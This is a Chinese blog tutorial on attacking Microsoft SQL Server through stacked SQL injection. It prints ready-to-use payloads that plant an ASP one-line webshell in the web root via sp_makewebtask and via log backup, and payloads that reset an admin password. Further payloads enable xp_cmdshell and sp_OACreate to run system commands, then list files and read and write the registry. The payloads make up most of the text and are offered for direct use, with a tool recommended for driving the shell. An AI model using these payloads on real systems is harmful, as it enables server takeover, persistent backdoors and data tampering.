Sql server注入分类之上马与组件扩展

于 2020-12-17 15:15:20 发布
阅读量276 收藏
点赞数
文章标签: mssql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42990434/article/details/111315842
版权

本章目录:

Mssql上马

1. 利用sp_makewebtask写入一句话木马

1 . 修复上传

;exec sp_makewebtask 'c:\inetpub\wwwroot\x.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''--

;exec sp_configure ‘Web Assistant Procedures’, 1; RECONFIGURE

代码讲解:实际上是用sp_makewebtask这个任务来把这个一句话保存在自己定义的目录下,生成了个x1.asp 文件,这个文件这里一般都是asp结尾的,而且这里是编码过得,要看的话可以解码来看

http://mssql.sql.com/aspx.aspx?id=1%20;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execute(request("cmd"))%>%27%27%27--

这样就证明一句话写进去了,这样会在你定义的那个目录里面生成了个.asp文件,然后用菜刀去连接着一句话就行了。
http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/432F8AC3A3DD4AC0BA94BCB5CFD58856/056270B201664C0F97492E5F837DE297/11538

  1. 修改管理员密码(日站谨慎操作,实验千万条,安全第一条。操作不规范,亲人两行泪!!)

    update admin set password=123123 where username=‘admin’;

2. dbowner权限下写一句话

  • 第一步:;alter database ssdown5 set RECOVERY FULL

    //先将数据库改成recovery full 的模式

  • 第二步:;create table test(str image)--

    //然后再创建一个表

  • 第三步:;backup log ssdown5 to disk=‘c:\test’ with init--

    ///然后备份一下

  • 第四步:;insert into test(str)values (’<%excute(request(“cmd”))%>’)--

    //插入一句话到表里面

  • 第五步:;backup log ssdown5 to disk=‘c:\inetpub\wwwroot\ x.asp’--

    //然后就备份到网站的根目录生成一个 x.asp的文件。

  • 第六步:;alter database ssdown5 set RECOVERY simple

    //最后将数据库改成recovery simple的模式

其实有工具可以使用:GetWebShell增强版 (操作如下)
http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/432F8AC3A3DD4AC0BA94BCB5CFD58856/CD783D87CB3347C9965BB2E47E5E1B20/11605
1、注入地址就是目标地址;

2、插入代码就是一句话

3、备份路径就是网页的根目录,生成了个asp文件

4、这里可以一步一步来点,也可以一键备份全搞定,都一样。

组件扩展

堆叠注入下的扩展运用

  • xp_cmdshell //命令执行,高版本默认关闭,但可以打开

    • Exec sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

    • Exec master.dbo.xp_cmdshell ‘whoami’;

  • sp_OACreate //命令执行,文件操作,无回显

    • EXEC sp_configure ‘show advanced options’, 1;

    • RECONFIGURE WITH OVERRIDE;

    • EXEC sp_configure ‘Ole Automation Procedures’, 1;

    • RECONFIGURE WITH OVERRIDE;

    • EXEC sp_configure ‘show advanced options’, 0;

    • declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,‘run’,null,‘c:\windows\system32\cmd.exe /c whoami >D:\\1.txt’;

  • xp_dirtreexp_subdirs //列文件,xp_fileexist 确定文件是否存在

    • execute master…xp_dirtree ‘c:’,1,1

    • execute master…xp_subdirs ‘c:’

    • execute master…xp_fileexist ‘D:\test.txt’

  • xp_regenumvalues,xp_regread ,xp_regwrite, xp_regdeletevalue,xp_regdeletekey //注册表操作。

    • exec xp_regenumvalues’HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run’

    • EXEC master…xp_regenumvalues ‘HKEY_CURRENT_USER’,‘Control Panel\International’,‘sCountry’;

  • sp_helpextendedproc //查看全部扩展

    • EXEC master…sp_helpextendedproc

  • xp_availablemedia //查看驱动器

    • exec master…xp_availablemedia

  • sp_who2 //查看登录账户

    • EXEC master…sp_who2
玖飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
记一次sql注入艰难上传马过程
weixin_46079186的博客
01-26 4819
先说一下我的思路,得到一个sql注入点,sqlmap 进行os-shell ,然后想上传webshell,首先进行cs 上线,发现无法上线cs,原因是目标系统windwos 2003 没有powershell,换一个思路,先找到web路径,然后上传webshell。找到web路径之后,发现路径带中文,os-shell写入webshell 的时候就会提示没有这个路径,然后进行一个手注发现上传成功 发现注入点,使用sqlmap进行os-shell 尝试上线cs,为了更好的后续操作(失败) 执行powersh
MSsql2005(Sa)权限执行命令总结.txt
07-18
权限执行命令总结权限执行命令总结
详述MSSQL服务在渗透测试中的利用 (下篇)
dfdhxb995397的博客
07-28 299
part3 MSSQL写文件步骤1 sp_makewebtask写文件因为是`SA`权限,如果目标服务器是web服务器,我们也不用去备份了,可以直接写个一句话木马进去到web目录。在不知道web目录的情况下我们可以使用以下SQL语句来列目录: exec master.dbo.xp_subdirs 'c:\www\'; `sp_...
SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask
如鹿渴慕泉水的专栏
01-26 3814
1. 开启和关毕xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EX
SQL Server 查看数据库扩展属性
12-14
1.fn_listextendedproperty 函数可以基于对象类型显示单个数据库对象或数据库中所有对象的扩展属性。例如,可以返回表或表中所有列的扩展属性。  A.下面的示例显示了数据库本身设置的所有扩展属性。  USE ...
三步堵死 SQL Server注入漏洞
12-15
SQL注入是什么? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,...
Sql serversql注入
12-14
使用参数集合与动态SQL  4.输入滤波  5.过滤LIKE条款的特殊字符  …如果有遗漏的也欢迎园子的大大们指教。  Sample:  var Shipcity;  ShipCity = Request.form ("ShipCity");  var sql = "select * ...
SQL Server 2005向后兼容组件包32或64位
07-05
X86/X64 SQLServer2005_BC_x32.msi SQLServer2005_BC_x64.msi
利用MSSQL getshell
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填写目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
MS sql数据库检测工具
12-19
MSSQL数据库的检测工具,可以检测出哪些页有问题。
学习MySQL这一篇就够了
热门推荐
轻松的小希
11-25 21万+
第一章 数据库概述 1.1、数据库的好处 将数据持久化到本地 提供结构化查询功能 1.2、数据库的常见概念 DB:数据库,存储数据的仓库 DBS:数据库管理系统,又称为数据库软件或者数据库产品,用于创建和管理DB,常见的有MySQL、Oracle、DB2、SQL Server SQL:结构化查询语言,用于和数据库通信的语言,不是某个数据库软件特有的,而是几乎所有的主流数据库软件通用的语言 1.3、数据库的存储特点 数据存放到表中,然后表再放到库中 一个库中可以有多张表,每张表具有唯一的表名用来标识
MsSql手工注入——————笔记
tell_me_404的博客
02-27 440
一、mssql的基本介绍 access :多为asp脚本 Mssql : 多为aspx动态脚本语言 适用于中小型企业,学校(也有oracle) 基要:(默认端口1433,文件.mdf(数据库) .ldf(日志) mssql简单操作 1、新建数据库:设置列名表名和内容及其它 -------占用状态下不能删除,故分离 2、删除数据库:分离-删除连接和源路径文件 3、复制数据库:分离-复制源路径文件...
详细MSSQL注入语句
收集盒 Book box
09-15 1622
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(int,@@versi
一句话木马写入以及通过sql进行服务器的远程控制
weixin_44720762的博客
04-21 1885
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。 在演示通过sql进行服务器的远程控制之前,必须首先清除两个基本的概念,也就是一句话木马以及如何通过into_outfile写入代码并控...
sql server注入查询数据库
最新发布
06-04
SQL Server注入是指攻击者利用程序对输入数据没有进行充分检查过滤的漏洞,向程序中注入恶意的SQL语句,从而达到控制数据库的目的。攻击者可以通过SQL Server注入的方式获取、修改、删除数据库中的数据。 下面是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值